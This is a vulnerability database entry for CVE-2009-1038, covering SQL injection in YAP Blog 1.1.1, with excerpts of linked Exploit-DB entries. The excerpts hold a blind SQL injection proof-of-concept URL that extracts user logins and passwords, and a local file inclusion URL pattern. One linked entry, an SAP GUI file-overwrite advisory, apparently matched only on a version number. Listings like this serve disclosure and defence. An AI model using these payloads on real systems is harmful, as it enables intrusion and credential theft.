CVE-2009-1038
Published 2009-03-20
CVE-2009-1038: Multiple SQL injection vulnerabilities in YAP Blog 1.1.1 allow remote attackers to execute arbitrary SQL commands via the (1) image_id parameter to…
Priority: P3, 36, medium
CVSS 2.0: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
EXPLOIT
EPSS: 0.88% (54.5th percentile)
Multiple SQL injection vulnerabilities in YAP Blog 1.1.1 allow remote attackers to execute arbitrary SQL commands via the (1) image_id parameter to comments.php, and remote authenticated administrators to execute arbitrary SQL commands via the (2) user parameter in a modif action to admin/index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yap | yap_blog | — | — |
No detection rules found.
Exploit-DB
EnjoySAP 6.4/7.1 - File Overwrite
exploitdb·2009-09-28
---
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-044
Application: EnjoySAP, SAP GUI for Windows 6.4 and 7.1
Versions Affected: Tested on 7100.2.7.1038 PL 7
Vendor URL: http://SAP.com
Bugs: insecure method, file overwriting
Exploits: YES
Reported: 02.07.2009
Vendor response: 02.07.2009
Date of Public Advisory: 22 Sep
CVE-number:
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
SAP GUI for Windows 7.1 and 6.4 contains the ActiveX component EAI WebViewer3D (file WebViewer3D.dll), Lib GUID: {AFBBE070-7340-11d2-AA6B-00E02924C34E},
which contains an insecure method that can overwrite any file in the system.
Details
An attacker can construct an HTML page which calls one of the vulnerable functions, such as:
1)
Exploit-DB
YAP 1.1.1 - Blind SQL Injection / SQL Injection
exploitdb·2009-03-16
CVE-2009-1038 YAP 1.1.1 - Blind SQL Injection / SQL Injection
---
#######################################################################################################
[+] YAP 1.1.1 Blind SQL Injection/SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
########################################################################################################
[+] Blind SQL Injection
The default prefix for database tables is "yap_", but it can be changed
at installation.
PoC :
http://127.0.0.1/[path]/comments.php?image_id=1 and ascii(substring((SELECT concat(login,0x3a,pass) from yap_user limit 0,1),1,1))>97
First character of the username is char(97), is "a".
http://127.0.0.1/[path]/comments.php?image_id=1 and ascii(substring((SELECT concat(login,0x3a,pass) from yap_
Exploit-DB
YAP 1.1.1 - 'index.php' Local File Inclusion
exploitdb·2009-03-13
CVE-2009-1038 YAP 1.1.1 - 'index.php' Local File Inclusion
---
#########################################################
# YAP v1.1.1 Local File Inclusion Vulnerability #
#########################################################
# AUTHOR : Alkindiii
# CONTACT : Alkindiii [4T] islamway {D0T} net
# HOME : http://www.soqor.net
# Script : YAP
# Version : 1.1.1
# Download v1.1 : http://wildmary.net-sauvage.com/share/yap1.1.tar.gz
# Update to v1.1.1 : http://wildmary.net-sauvage.com/share/yap-patch1.1.1.zip
# EXPLOIT : http://www.site.com/index.php?page=[LFI]%00
# GREETZ : HACKERS PAL, Dr.Cr@ck, All soqor.net members, All Moroccan Hackers.
# milw0rm.com [2009-03-13]
No writeups or analysis indexed.
2009-03-20: Published